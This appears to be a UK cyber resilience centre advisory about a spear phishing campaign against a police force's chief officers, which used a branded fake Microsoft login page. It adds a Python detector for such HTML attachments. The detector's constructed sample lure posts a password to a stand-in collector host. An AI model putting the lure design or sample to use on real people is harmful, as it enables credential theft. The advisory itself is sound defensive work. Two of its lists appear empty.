To demonstrate that not even police forces are exempt from cyber criminality, an unnamed UK police force has been the subject of a spear phishing campaign.
Spear phishing is an email or electronic communications scam targeted towards a specific individual, organisation or business. Although often intended to steal data for malicious purposes, cybercriminals may also intend to install malware on a targeted user’s computer.
Typically, an email arrives, apparently from a trustworthy source, but instead it leads the unknowing recipient to a bogus website full of malware. These emails often use clever tactics to get the victim's attention.
In this particular campaign, the intended victims were chief officers within the force, and the emails contained potentially malicious attachments.
The attachment redirected the recipients to a Microsoft Office login page with the user's email address displayed, prompting the user to enter a password, just as the usual Microsoft login window does.
The emails were delivered between 09:00 and 10:00 hours on December 12 with the title “Westshire-pcc November Financial Report” (Westshire used here to hide the actual force name).
Attached to the email was an HTML file named Expense.Report providing the link to the malicious login page.
The link then loaded an HTML page showing what appeared to be a standard Microsoft login prompt, with the user's email address already entered so that only the password was requested.
Before this login box was displayed, a blurred video played for an instant, giving the impression of an Outlook inbox, presumably to suggest that the user was being automatically signed in to an already open email account.
To add to the impression that the page was entirely genuine, a picture of the force headquarters was used as the background behind the login page, and the force crest and title appeared within the login box.
All in all, the campaign was a very in-depth and extremely sophisticated spear phishing attempt that a recipient could easily have fallen for.
The efforts of the threat actors to craft this campaign could easily be adapted to suit other UK organisations with minimal time and effort.
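As an added illustration (not code from the article or from the EMCRC), the following Python heuristic flags HTML email attachments that share the features of the lure described above: a password field, the recipient's own address pre-filled, login-brand wording and a form that posts somewhere external. The sample lure and the recipient address below are constructed placeholders, not the real attachment.

```python
from html.parser import HTMLParser

BRAND_WORDS = ("microsoft", "office 365", "outlook", "sign in")

class _LoginPageScanner(HTMLParser):
    """Collects the features the heuristic checks from an HTML attachment."""

    def __init__(self):
        super().__init__()
        self.password_inputs = 0   # <input type="password"> count
        self.input_values = []     # pre-filled values of every <input>
        self.form_actions = []     # where each <form> submits to
        self.text = []             # visible text, for brand wording

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input":
            if a.get("type", "").lower() == "password":
                self.password_inputs += 1
            self.input_values.append(a.get("value", ""))
        elif tag == "form":
            self.form_actions.append(a.get("action", ""))

    def handle_data(self, data):
        self.text.append(data)

def score_html_attachment(html, recipient):
    """Return (suspicious, reasons) for one HTML attachment sent to `recipient`."""
    s = _LoginPageScanner()
    s.feed(html)
    body = " ".join(s.text).lower()
    reasons = []
    if s.password_inputs:
        reasons.append("password field inside an attachment")
    if recipient.lower() in (v.lower() for v in s.input_values) or recipient.lower() in body:
        reasons.append("recipient address pre-filled")
    if any(w in body for w in BRAND_WORDS):
        reasons.append("login-brand wording")
    if any(act.lower().startswith("http") for act in s.form_actions):
        reasons.append("form posts credentials to an external URL")
    return len(reasons) >= 2, reasons

# Constructed sample (not the real attachment), shaped like the lure the article describes.
SAMPLE_RECIPIENT = "chief.officer@westshire-pcc.example"
SAMPLE_LURE = (
    "<html><body><h1>Microsoft Sign in</h1>"
    '<form action="https://collector.example/post">'
    f'<input type="email" name="login" value="{SAMPLE_RECIPIENT}">'
    '<input type="password" name="passwd"></form></body></html>'
)
```

A mail gateway or SOC triage script can run this over every HTML attachment and quarantine or alert when two or more reasons fire; a legitimate expense report should never carry a password field at all.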
Here are some common red flags of a spear phishing attempt:
Security awareness training is fundamental in preventing any type of phishing attack, especially when many users are working from home. The training is one of the services we offer at the EMCRC.
To prevent spear phishing attacks, organisations should:
Reporting
Report all Fraud and Cybercrime to Action Fraud by calling 0300 123 2040 or online. Forward suspicious emails to report@phishing.gov.uk. Report SMS scams by forwarding the original message to 7726 (spells SPAM on the keypad).